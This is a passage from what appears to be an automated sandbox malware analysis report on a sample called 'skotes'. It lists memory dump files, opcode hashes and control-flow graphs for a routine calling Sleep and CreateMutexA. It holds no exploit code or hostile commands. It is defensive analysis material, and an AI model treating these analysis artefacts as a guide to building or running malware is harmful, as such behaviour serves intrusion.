                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: abe7231697aa63001183fcc477572f0a5cfa5d0da3fd1f6a6f0eaa16ba71dcca
                                                                                                                                                                                                                                                              • Instruction ID: 038b2d6bcab89ba5c3a3dc3ccb59f850473a067589875a5fbb2a58b6253d68aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abe7231697aa63001183fcc477572f0a5cfa5d0da3fd1f6a6f0eaa16ba71dcca
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5216A316042009BEB18AF6CECC576EF3A5EBC7314F244629E108EF2D5D7B56981C612

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 306 eaa856-eaa86e 307 eaa89c-eaa89e 306->307 308 eaa870-eaa87c 306->308 309 eaa8a9-eaa8b1 call ea7d30 307->309 310 eaa8a0-eaa8a7 307->310 311 eaa87e-eaa88c 308->311 312 eaa892-eaa899 call ebd663 308->312 323 eaa8b3-eaa8bb call ea7d30 309->323 324 eaa8e4-eaa8e6 309->324 313 eaa8eb-eaa916 call eb80c0 310->313 311->312 315 eaa94e 311->315 312->307 319 eaa953-eaa987 Sleep CreateMutexA 315->319 320 eaa94e call ed6c6a 315->320 326 eaa98e-eaa994 319->326 320->319 323->324 330 eaa8bd-eaa8c5 call ea7d30 323->330 324->313 328 eaa996-eaa998 326->328 329 eaa9a7-eaa9a8 326->329 328->329 331 eaa99a-eaa9a5 328->331 330->324 335 eaa8c7-eaa8cf call ea7d30 330->335 331->329 335->324 338 eaa8d1-eaa8d9 call ea7d30 335->338 338->324 341 eaa8db-eaa8e2 338->341 341->313
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 61f5a1d650c384898796c3c5dfb94571aed5b35ebe73829718426918d1e281ac
                                                                                                                                                                                                                                                              • Instruction ID: c3a1e6e458a330f21e6dad38220be453e8c022a1e04aa96c25bd4587df3f8701
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61f5a1d650c384898796c3c5dfb94571aed5b35ebe73829718426918d1e281ac
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F2120312443019AF7386B68DC9A77EB391DF8B704F186925E544FE2D1C77AB941C153

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 283 eaa34f-eaa35b 284 eaa35d-eaa36b 283->284 285 eaa371-eaa39a call ebd663 283->285 284->285 286 eaa93a 284->286 291 eaa3c8-eaa916 call eb80c0 285->291 292 eaa39c-eaa3a8 285->292 289 eaa953-eaa994 Sleep CreateMutexA 286->289 290 eaa93a call ed6c6a 286->290 299 eaa996-eaa998 289->299 300 eaa9a7-eaa9a8 289->300 290->289 293 eaa3aa-eaa3b8 292->293 294 eaa3be-eaa3c5 call ebd663 292->294 293->286 293->294 294->291 299->300 303 eaa99a-eaa9a5 299->303 303->300
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: e0bb4350918261b17991e5d362a7ab4a26b934a8ce3e1f3af4d7d80216850ef2
                                                                                                                                                                                                                                                              • Instruction ID: bd8d7b1a09a64ba7539891e8feea1ca0123466720eeec4f97104dd8fa7ba29d4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0bb4350918261b17991e5d362a7ab4a26b934a8ce3e1f3af4d7d80216850ef2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD214B3160430097EB18AF6CEC8577DB7A5DBC7314F285629E504EB2D4C7B56580C212
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
